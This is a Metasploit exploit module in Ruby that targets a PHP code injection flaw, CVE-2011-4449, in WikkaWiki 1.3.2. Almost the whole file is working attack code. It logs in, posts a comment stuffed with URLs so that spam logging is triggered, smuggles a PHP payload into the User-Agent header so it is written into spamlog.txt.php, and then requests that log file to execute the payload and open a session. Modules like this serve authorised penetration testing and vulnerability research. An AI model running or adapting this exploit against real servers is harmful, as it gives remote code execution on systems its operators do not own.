##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
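class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "WikkaWiki 1.3.2 Spam Logging PHP Injection",
      'Description'    => %q{
          This module exploits a vulnerability found in WikkaWiki. When the spam logging
        feature is enabled, it is possible to inject PHP code into the spam log file via the
        UserAgent header, and then request it to execute our payload. There are at least
        three different ways to trigger spam protection, this module does so by generating
        10 fake URLs in a comment (by default, the max_new_comment_urls parameter is 6).
        Please note that in order to use the injection, you must manually pick a page
        first that allows you to add a comment, and then set it as 'PAGE'.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'EgiX',   # Initial discovery, PoC
          'sinn3r'  # Metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2011-4449'],
          ['OSVDB', '77391'],
          ['EDB', '18177'],
          ['URL', 'http://wush.net/trac/wikka/ticket/1098']
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00"
        },
      'DefaultOptions' =>
        {
          'ExitFunction' => "none"
        },
      'Arch'           => ARCH_PHP,
      'Platform'       => ['php'],
      'Targets'        =>
        [
          ['WikkaWiki 1.3.2 r1814', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Nov 30 2011",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('USERNAME',  [true, 'WikkaWiki username']),
        OptString.new('PASSWORD',  [true, 'WikkaWiki password']),
        OptString.new('PAGE',      [true, 'Page to inject']),
        OptString.new('TARGETURI', [true, 'The URI path to WikkaWiki', '/wikka/'])
      ], self.class)
  end

  #
  # Base path of the wiki derived from TARGETURI, always ending in '/'.
  # Built without mutating the string returned by target_uri.
  #
  def base_path
    path = target_uri.path
    path.end_with?('/') ? path : "#{path}/"
  end

  #
  # Absolute Referer for +uri+ that matches the scheme and port we actually
  # talk to. The default port is only omitted when it matches the scheme,
  # so an SSL target on 443 does not get a bogus ":443" (or "http://").
  #
  def referer_for(uri)
    scheme = datastore['SSL'] ? 'https' : 'http'
    default_port = datastore['SSL'] ? 443 : 80
    port = (rport.to_i == default_port) ? '' : ":#{rport}"
    host = datastore['VHOST'] || rhost
    "#{scheme}://#{host}#{port}#{uri}"
  end

  #
  # Only detects a WikkaWiki install. Whether spam logging is enabled and
  # whether the account may comment on PAGE cannot be confirmed remotely,
  # so this never reports more than Detected.
  #
  def check
    res = send_request_raw({
      'method' => 'GET',
      'uri'    => "#{base_path}wikka.php?wakka=HomePage"
    })

    if res and res.body =~ /Powered by WikkaWiki/
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  end

  #
  # Get the session cookie before we do any of that login/exploity stuff.
  # Raises RuntimeError when no usable cookie comes back, instead of
  # silently returning nil and failing later at login.
  #
  def get_cookie
    res = send_request_raw({
      'method' => 'GET',
      'uri'    => "#{@base}wikka.php"
    })

    # The cookie arrives in this format:
    # 96522b217a86eca82f6d72ef88c4c7f4=pr5sfcofh5848vnc2sm912ean2; path=/wikka
    cookie = nil
    if res and res.headers['Set-Cookie']
      cookie = res.headers['Set-Cookie'].scan(/(\w+\=\w+); path\=.+$/).flatten[0]
    end

    if cookie.nil?
      raise RuntimeError, "#{@peer} - No cookie found, will not continue"
    end

    cookie
  end

  #
  # Log in with USERNAME/PASSWORD and return the cookie string that carries
  # the session plus the user_name@/pass@ credential cookies.
  # Raises RuntimeError when the login form or the credential cookies are
  # missing. The password is deliberately not echoed into the error message,
  # since module exceptions end up in framework logs.
  #
  def login(cookie)
    # Fetch the login page first; it carries hidden fields the POST needs
    uri = "#{@base}wikka.php?wakka=UserSettings"
    res = send_request_raw({
      'method' => 'GET',
      'uri'    => uri,
      'cookie' => cookie
    })

    # Extract the hidden fields
    login_fields = {}
    if res and res.body =~ /\<div id\=\"content\"\>.+\<fieldset class\=\"hidden\"\>(.+)\<\/fieldset\>.+\<legend\>Login\/Register\<\/legend\>/m
      $1.scan(/\<input type\=\"hidden\" name\=\"(\w+)\" value\=\"(\w+)\" \/>/).each do |name, value|
        login_fields[name] = value
      end
    else
      raise RuntimeError, "#{@peer} - Unable to find the hidden fieldset required for login"
    end

    # Add the rest of the fields required for login
    login_fields['action']       = 'login'
    login_fields['name']         = datastore['USERNAME']
    login_fields['password']     = datastore['PASSWORD']
    login_fields['do_redirect']  = 'on'
    login_fields['submit']       = "Login"
    login_fields['confpassword'] = ''
    login_fields['email']        = ''

    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => uri,
      'cookie'    => cookie,
      'headers'   => { 'Referer' => referer_for(uri) },
      'vars_post' => login_fields
    })

    unless res and res.headers['Set-Cookie'] =~ /user_name/
      raise RuntimeError, "#{@peer} - Unable to login as \"#{datastore['USERNAME']}\""
    end

    # scan() with a capture group yields nested arrays; flatten so the
    # interpolation below gets the string and not its inspect() form
    user = res.headers['Set-Cookie'].scan(/(user_name\@\w+=\w+);/).flatten[0] || ""
    pass = res.headers['Set-Cookie'].scan(/(pass\@\w+=\w+)/).flatten[0] || ""

    "#{cookie}; #{user}; #{pass}"
  end

  #
  # After login, post a comment with enough URLs to trip spam protection
  # while carrying the PHP payload in the User-Agent header, then request
  # the spam log so the injected code executes.
  #
  # Note for operators: this leaves the payload in spamlog.txt.php on the
  # target, which is both a forensic artifact and callable by anyone who
  # can reach that path; clean it up after the engagement.
  #
  def inject_exec(cookie)
    # Get the hidden fields required to post a comment on PAGE
    res = send_request_raw({
      'method' => 'GET',
      'uri'    => "#{@base}wikka.php?wakka=#{datastore['PAGE']}&show_comments=1",
      'cookie' => cookie
    })

    fields = {}
    if res and res.body =~ /\<form action\=.+processcomment.+\<fieldset class\=\"hidden\"\>(.+)\<\/fieldset\>/m
      $1.scan(/\<input type\=\"hidden\" name\=\"(\w+)\" value\=\"(.+)\" \/>/).each do |n, v|
        fields[n] = v
      end
    else
      raise RuntimeError, "#{@peer} - Cannot get necessary fields before posting a comment"
    end

    # Generate enough URLs to trigger spam logging (max_new_comment_urls defaults to 6)
    urls = ''
    10.times do
      urls << "http://www.#{rand_text_alpha_lower(rand(10)+6)}.#{['com', 'net', 'us', 'info'].sample}\n"
    end

    fields['body']   = urls
    fields['submit'] = 'Add'

    # Inject the payload; the Referer is built once and reused so scheme,
    # host, port and path stay consistent with the request itself
    uri = "#{@base}wikka.php?wakka=#{datastore['PAGE']}/addcomment"
    send_request_cgi({
      'method'    => 'POST',
      'uri'       => uri,
      'cookie'    => cookie,
      'headers'   => { 'Referer' => referer_for(uri) },
      'vars_post' => fields,
      'agent'     => "<?php #{payload.encoded} ?>"
    })

    # The spam log is a .php file, so fetching it runs what we just logged
    send_request_raw({
      'method' => 'GET',
      'uri'    => "#{@base}spamlog.txt.php"
    })
  end

  def exploit
    @peer = "#{rhost}:#{rport}"
    @base = base_path

    print_status("#{@peer} - Getting cookie")
    cookie = get_cookie

    print_status("#{@peer} - Logging in")
    cred = login(cookie)

    print_status("#{@peer} - Triggering spam logging")
    inject_exec(cred)

    handler
  end
end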
=begin
For testing:
svn -r 1814 co https://wush.net/svn/wikka/trunk wikka
Open wikka.config.php, do:
'spam_logging' => '1'
=end
